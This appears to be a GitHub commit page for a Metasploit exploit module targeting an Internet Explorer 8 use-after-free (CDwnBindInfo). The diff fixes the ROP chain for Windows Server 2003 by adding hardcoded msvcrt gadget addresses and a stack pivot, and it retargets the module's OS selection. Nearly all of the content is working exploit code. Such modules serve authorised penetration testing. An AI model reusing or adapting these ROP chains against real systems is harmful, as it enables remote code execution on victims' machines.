
Commit cd58cc7

author
jvazquez-r7
committed
fixed rop chain for w2003
1 parent cab84b5 commit cd58cc7

1 file changed

+13
-9
lines changed


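--- a/modules/exploits/windows/browser/ie_cdwnbindinfo_uaf.rb
+++ b/modules/exploits/windows/browser/ie_cdwnbindinfo_uaf.rb
@@ -58,8 +58,8 @@ def initialize(info={})
 [ 'Automatic', {} ],
 [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt, 'Offset' => '0x586' } ], # 0x0c0c0b30
 [ 'IE 8 on Windows Vista', { 'Rop' => :jre, 'Offset' => '0x586' } ], # 0x0c0c0b30
-[ 'IE 8 on Windows Server 2003', { 'Rop' => :jre, 'Offset' => '0x586' } ], # 0x0c0c0b30
-[ 'IE 8 on Windows 7', { 'Rop' => :jre, 'Offset' => '0x586' } ] # 0x0c0c0b30
+[ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt, 'Offset' => '0x586' } ], # 0x0c0c0b30
+[ 'IE 8 on Windows 7', { 'Rop' => :jre, 'Offset' => '0x586' } ], # 0x0c0c0b30
 ],
 'Privileged' => false,
 'DisclosureDate' => "Dec 27 2012",
@@ -90,9 +90,6 @@ def get_target(agent)
 os_name = 'Windows Vista'
 when '6.1'
 os_name = 'Windows 7'
-else
-# OS not supported
-return nil
 end
 
 targets.each do |t|
@@ -152,10 +149,17 @@ def get_payload(t, cli)
 case t['Rop']
 when :msvcrt
 print_status("Using msvcrt ROP")
-stack_pivot = [0x77c15ed6].pack("V") * 54 # ret
-stack_pivot << [0x77c2362c].pack("V") # pop ebx, #ret
-stack_pivot << [0x77c15ed5].pack("V") # xchg eax,esp # ret # 0x0c0c0c0c
-rop_payload = generate_rop_payload('msvcrt', code, {'pivot'=>stack_pivot, 'target'=>'xp'})
+if t['Name'] =~ /Windows XP/
+stack_pivot = [0x77c15ed6].pack("V") * 54 # ret
+stack_pivot << [0x77c2362c].pack("V") # pop ebx, #ret
+stack_pivot << [0x77c15ed5].pack("V") # xchg eax,esp # ret # 0x0c0c0c0c
+rop_payload = generate_rop_payload('msvcrt', code, {'pivot'=>stack_pivot, 'target'=>'xp'})
+else
+stack_pivot = [0x77bcba5f].pack("V") * 54 # ret
+stack_pivot << [0x77bb4158].pack("V") # pop ebx, #ret
+stack_pivot << [0x77bcba5e].pack("V") # xchg eax,esp # ret # 0x0c0c0c0c
+rop_payload = generate_rop_payload('msvcrt', code, {'pivot'=>stack_pivot, 'target'=>'2003'})
+end
 else
 print_status("Using JRE ROP")
 stack_pivot = [0x7c348b06].pack("V") * 54 # ret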
